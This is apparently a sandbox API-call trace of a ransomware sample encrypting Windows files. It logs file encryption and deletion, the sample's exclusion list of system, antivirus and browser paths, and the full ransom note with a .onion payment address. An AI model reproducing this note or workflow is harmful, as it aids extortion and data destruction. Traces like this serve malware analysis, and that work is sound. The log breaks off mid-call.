returned 0x0 [0160.691] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.691] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.692] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.692] GetLastError () returned 0x0 [0160.692] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.692] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.692] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.692] GetLastError () returned 0x0 [0160.692] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.692] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.692] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.692] GetLastError () returned 0x0 [0160.692] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.692] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.692] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0160.692] GetLastError () returned 0x0 [0160.692] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0160.692] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0160.692] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0160.693] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\tipresx.dll.mui")) returned 0x20 [0160.693] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0160.693] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui") returned 1 [0160.693] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\tipresx.dll.mui")) returned 0 [0160.693] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui" [0160.693] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU") returned 1 [0160.693] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\.xXE70A.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\.xxe70a.tmp")) returned 0xe70a [0160.694] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\.xXE70A.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\.xxe70a.tmp"), dwFlags=0x1) returned 0 [0160.694] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\.xXE70A.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\.xxe70a.tmp")) returned 1 [0160.694] CryptDestroyKey (hKey=0x9ad238) returned 1 [0160.694] wcslen (_String="OK") returned 0x2 [0160.694] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.694] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.694] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0160.694] CryptDestroyHash (hHash=0x9ad4f8) returned 1 [0160.695] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0160.695] FindNextFileW (in: hFindFile=0x9ad1b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0160.695] GetLastError () returned 0x12 [0160.695] FindClose (in: hFindFile=0x9ad1b8 | out: hFindFile=0x9ad1b8) returned 1 [0160.695] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0160.695] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0160.696] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0160.696] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0160.696] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.696] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.696] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0160.696] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.696] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.696] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*.exe") returned 0 [0160.696] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*.dll") returned 0 [0160.696] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*.lnk") returned 0 [0160.696] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*.bat") returned 0 [0160.696] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*.ini") returned 0 [0160.696] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*.msi") returned 0 [0160.696] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*.scf") returned 0 [0160.696] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*pagefile.sys*") returned 0 [0160.696] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*NTUSER.DAT*") returned 0 [0160.696] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*AppData*") returned 0 [0160.696] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*\\winrar\\*") returned 0 [0160.696] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0160.696] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*\\java\\*") returned 0 [0160.696] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0160.696] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*\\windows\\*") returned 0 [0160.696] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*\\ESET\\*") returned 0 [0160.696] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*\\AVG\\*") returned 0 [0160.696] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*\\AVIRA\\*") returned 0 [0160.696] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0160.696] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*Atheros*") returned 0 [0160.696] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*Realtek*") returned 0 [0160.696] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*bootmgr*") returned 0 [0160.696] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*boot*") returned 0 [0160.696] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*boot*") returned 0 [0160.696] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*CONFIG.SYS*") returned 0 [0160.696] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*IO.SYS*") returned 0 [0160.696] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*MSDOS.SYS*") returned 0 [0160.697] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*NTDETECT.COM*") returned 0 [0160.697] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*ntldr*") returned 0 [0160.697] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*chrome*") returned 0 [0160.697] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*opera*") returned 0 [0160.697] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", pszSpec="*firefox*") returned 0 [0160.697] wcslen (_String="\\\\?\\") returned 0x4 [0160.697] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad1f8 [0160.697] wcscmp (_String1=".", _String2=".") returned 0 [0160.697] FindNextFileW (in: hFindFile=0x9ad1f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0160.697] wcscmp (_String1="..", _String2=".") returned 1 [0160.697] wcscmp (_String1="..", _String2="..") returned 0 [0160.697] FindNextFileW (in: hFindFile=0x9ad1f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0160.697] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0160.698] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0160.698] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0160.698] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui", pszSpec="*") returned 1 [0160.698] strlen (_Str="NMoreira") returned 0x8 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.698] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, 